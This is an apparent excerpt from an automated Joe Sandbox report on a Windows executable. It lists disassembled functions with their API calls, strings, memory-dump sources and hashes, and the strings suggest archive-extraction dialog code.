                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    • Opcode ID: d48f47dad57643d5e1d5f215c6e91669a882743a98766574082f80cc12221a42
                                                                                                                    • Instruction ID: d8871185cc578ea247e6be7413a963ce626812202d4680a45a7e8e1e853d713a
                                                                                                                    • Opcode Fuzzy Hash: d48f47dad57643d5e1d5f215c6e91669a882743a98766574082f80cc12221a42
                                                                                                                    • Instruction Fuzzy Hash: A4512B35388300F6FE251A90BD4BFB576A6AB09B04F2465C7F397744E1C9A2E4D0A71B
                                                                                                                    Function 00E57F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00E57FAE
                                                                                                                    • _free.LIBCMT ref: 00E58079
                                                                                                                    • _free.LIBCMT ref: 00E58083
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                    • API String ID: 2506810119-1957095476
                                                                                                                    • Opcode ID: 3f0c29223dcc837c09eb77a74c0586f9be26ffe0dc422ac06e4e26c0032b8762
                                                                                                                    • Instruction ID: d1b1a9fd661da049786411ff1437ea3f12b7b2bed0a65abf872e225889b4872c
                                                                                                                    • Opcode Fuzzy Hash: 3f0c29223dcc837c09eb77a74c0586f9be26ffe0dc422ac06e4e26c0032b8762
                                                                                                                    • Instruction Fuzzy Hash: 1A31BF70A00218AFDB21DF95998599EBBFCEB84301F10546BEE04B7251DA708E4CCBA0
                                                                                                                    Function 00E531D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E531FB
                                                                                                                    • _abort.LIBCMT ref: 00E53306
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    • Opcode ID: 15b7773b411552ed72f6adb973121204198f515c8c7487609efc4f0d89637d5f
                                                                                                                    • Instruction ID: fe8cdbac8f4b41a6c68fa8d2ed86ca0db154f429c104799b901b2563815fed0c
                                                                                                                    • Opcode Fuzzy Hash: 15b7773b411552ed72f6adb973121204198f515c8c7487609efc4f0d89637d5f
                                                                                                                    • Instruction Fuzzy Hash: 94417836900209AFCF15DFA8CC81AAEBBB5FF48349F189459FD04B7221D335AA54DB50
                                                                                                                    Function 00E37401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E37406
                                                                                                                      • Part of subcall function 00E33BBA: __EH_prolog.LIBCMT ref: 00E33BBF
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00E374CD
                                                                                                                      • Part of subcall function 00E37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E37AAB
                                                                                                                      • Part of subcall function 00E37A9C: GetLastError.KERNEL32 ref: 00E37AF1
                                                                                                                      • Part of subcall function 00E37A9C: CloseHandle.KERNEL32(?), ref: 00E37B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    • Opcode ID: 67ee6c085535386283040c707ba467c8c8fea4f1656c948a9dd39cfa0b3769a8
                                                                                                                    • Instruction ID: 37212584062f4f1db437e861f43823f936b47efbcb050feb6f1d06e6556261d9
                                                                                                                    • Opcode Fuzzy Hash: 67ee6c085535386283040c707ba467c8c8fea4f1656c948a9dd39cfa0b3769a8
                                                                                                                    • Instruction Fuzzy Hash: C831B2B1D04248BEDF21EBA4DC49BEE7FE9AB05304F006056F485B7281CB749A88C761
                                                                                                                    Function 00E4AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00E4ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E4ADC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    • Opcode ID: 3ecd2baa25650e328b6c49c062796096664914411da04fdbf7ea95ce3b2545cf
                                                                                                                    • Instruction ID: a1d87b474f098d7400e6a1e2390b109744d83ad588e768a14127437b8f2d66d8
                                                                                                                    • Opcode Fuzzy Hash: 3ecd2baa25650e328b6c49c062796096664914411da04fdbf7ea95ce3b2545cf
                                                                                                                    • Instruction Fuzzy Hash: A811E9326C0200BFD7119F69EC09FA67BA9EF4A75AF141062F241F75A0C7619909D722
                                                                                                                    Function 00E4DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,0001047E,00E4B270,?,?), ref: 00E4DE18
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogParam
                                                                                                                    • String ID: GETPASSWORD1$r$xz
                                                                                                                    • API String ID: 665744214-1165776382
                                                                                                                    • Opcode ID: 88ee147a9a6ad7415452fdc804a4cb23d91663cf4926a2a01028e307b7863670
                                                                                                                    • Instruction ID: b107e484ccadbb5dea62bf7e45261fe4841b6886895b64d9b3fe184edde39357
                                                                                                                    • Opcode Fuzzy Hash: 88ee147a9a6ad7415452fdc804a4cb23d91663cf4926a2a01028e307b7863670
                                                                                                                    • Instruction Fuzzy Hash: D3115B32A44244AEDB11DE34BC06BEB3798EB45754F145069FD4DFB080D7B0AC88C760
                                                                                                                    Function 00E3D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 00E3D954
                                                                                                                    • _strncpy.LIBCMT ref: 00E3D99A
                                                                                                                      • Part of subcall function 00E41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E71030,00000200,00E3D928,00000000,?,00000050,00E71030), ref: 00E41DC4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: 243dfdcb03f848e414c7e713a8d9c19e85252505bac74fade60aa248fd5b2d37
                                                                                                                    • Instruction ID: 0d8167f2300ad67e841fe66fdabf7dec864413cc2fa6ee7475389b1e90e245e4
                                                                                                                    • Opcode Fuzzy Hash: 243dfdcb03f848e414c7e713a8d9c19e85252505bac74fade60aa248fd5b2d37
                                                                                                                    • Instruction Fuzzy Hash: D3219372444348AEEF21DEA4EC09FDE7FE8AF45304F041412F910B61A2E2B1D648DF51
                                                                                                                    Function 00E40E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E3AC5A,00000008,?,00000000,?,00E3D22D,?,00000000), ref: 00E40E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E3AC5A,00000008,?,00000000,?,00E3D22D,?,00000000), ref: 00E40E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E3AC5A,00000008,?,00000000,?,00E3D22D,?,00000000), ref: 00E40E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00E40EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: d52460d4247e292a22aaa547939c8da23a63818ba02761295f68ae833a169768
                                                                                                                    • Instruction ID: 37cbe0446469be92053350b48b248ba14915dbcb3550068aa5c0517930fb59a8
                                                                                                                    • Opcode Fuzzy Hash: d52460d4247e292a22aaa547939c8da23a63818ba02761295f68ae833a169768
                                                                                                                    • Instruction Fuzzy Hash: 2D11A3B1640708AFC3219F7AAC849A7FBECEB95784F106C2EF1DAD3200D6B559508B50
                                                                                                                    Function 00E3124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: ($2$A
                                                                                                                    • API String ID: 2696272793-112831991
                                                                                                                    • Opcode ID: 9a0c0a40f21d268f37862945d3eabadb2f80d4a5462a6df8fa3fa66e124c05e3
                                                                                                                    • Instruction ID: 4c066aa00809a89ee498ef8a0be67fc3af7a85db4f862bc488ff945dea30e4e8
                                                                                                                    • Opcode Fuzzy Hash: 9a0c0a40f21d268f37862945d3eabadb2f80d4a5462a6df8fa3fa66e124c05e3
                                                                                                                    • Instruction Fuzzy Hash: 99011BB1901219AFCB14CFA5E8489DFBBF8AF09304F10415BE905F3210D7759A44DF94
                                                                                                                    Function 00E4DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: 5179659853c64b954bafa3611e5b61c9ec887be4b17fe207377510cc06f227ec
                                                                                                                    • Instruction ID: 3454206cfec0b64130a11bbe90b58f70d52e0bb9697da7301563cc65bb08c8a8
                                                                                                                    • Opcode Fuzzy Hash: 5179659853c64b954bafa3611e5b61c9ec887be4b17fe207377510cc06f227ec
                                                                                                                    • Instruction Fuzzy Hash: C901D876E48245AFC711CF66FD089967BA8F759348B001526F409F3270D6709894EBA0
                                                                                                                    Function 00E31316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3E2E8: _swprintf.LIBCMT ref: 00E3E30E
                                                                                                                      • Part of subcall function 00E3E2E8: _strlen.LIBCMT ref: 00E3E32F
                                                                                                                      • Part of subcall function 00E3E2E8: SetDlgItemTextW.USER32(?,00E6E274,?), ref: 00E3E38F
                                                                                                                      • Part of subcall function 00E3E2E8: GetWindowRect.USER32(?,?), ref: 00E3E3C9
                                                                                                                      • Part of subcall function 00E3E2E8: GetClientRect.USER32(?,?), ref: 00E3E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                    • SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: $0
                                                                                                                    • API String ID: 2622349952-2895914132
                                                                                                                    • Opcode ID: 000984efaae32dcf43616911140b953311b06a5b2eec6843620e375471c6739d
                                                                                                                    • Instruction ID: b6c0a829c7d6f659a54ad225d5ed5a060537c5043fe941c649e81bd3f169831f
                                                                                                                    • Opcode Fuzzy Hash: 000984efaae32dcf43616911140b953311b06a5b2eec6843620e375471c6739d
                                                                                                                    • Instruction Fuzzy Hash: 36F04F30144388AADF151F658C0EBFE3F99AF44388F05A29DFC49755A1CB75C998EA50
                                                                                                                    Function 00E59A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction ID: 16be9cd60b34dfa8c6cbf45eedd828b0d2a530618b0d236c759b0978eb4d5a35
                                                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction Fuzzy Hash: 0FA12572A00786DFEB11CE28C8917EEFBE5EF51315F18596DE985AB283C2388949C750
                                                                                                                    Function 00E3A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E37F69,?,?,?), ref: 00E3A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E37F69,?), ref: 00E3A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E37F69,?,?,?,?,?,?,?), ref: 00E3A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00E37F69,?,?,?,?,?,?,?,?,?,?), ref: 00E3A4C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: 2d02acf3e6041fafa92457e404e4c29a057830d127018f71bd5f9aee5f8fe6e0
                                                                                                                    • Instruction ID: 92a44bc04d6c5cedad23b5f662818bd7de93c034f46635d843e3bf172c9ab74c
                                                                                                                    • Opcode Fuzzy Hash: 2d02acf3e6041fafa92457e404e4c29a057830d127018f71bd5f9aee5f8fe6e0
                                                                                                                    • Instruction Fuzzy Hash: B541B331148381AAD731DF24DC49FAFBBE4AF85704F08092DF5E5A3191D6A49A8CDB53
                                                                                                                    Function 00E5C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E591E0,?,00000000,?,00000001,?,?,00000001,00E591E0,?), ref: 00E5C9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E5CA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E56CBE,?), ref: 00E5CA70
                                                                                                                    • __freea.LIBCMT ref: 00E5CA79
                                                                                                                      • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: ddc2e597f8aaf6bafc8b1c44d8d88e3343ae1e73f30495666c4ba30a7d2c5727
                                                                                                                    • Instruction ID: f7805eb9a8db626e267cb11bc598d5ac45b2c790650798c6ee0904119d351ed9
                                                                                                                    • Opcode Fuzzy Hash: ddc2e597f8aaf6bafc8b1c44d8d88e3343ae1e73f30495666c4ba30a7d2c5727
                                                                                                                    • Instruction Fuzzy Hash: 7C31DD32A0020AAFCB24CF64DC65DAE7BA5EB01715B140628FC05F6292EB35DD98CB90
                                                                                                                    Function 00E4A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00E4A666
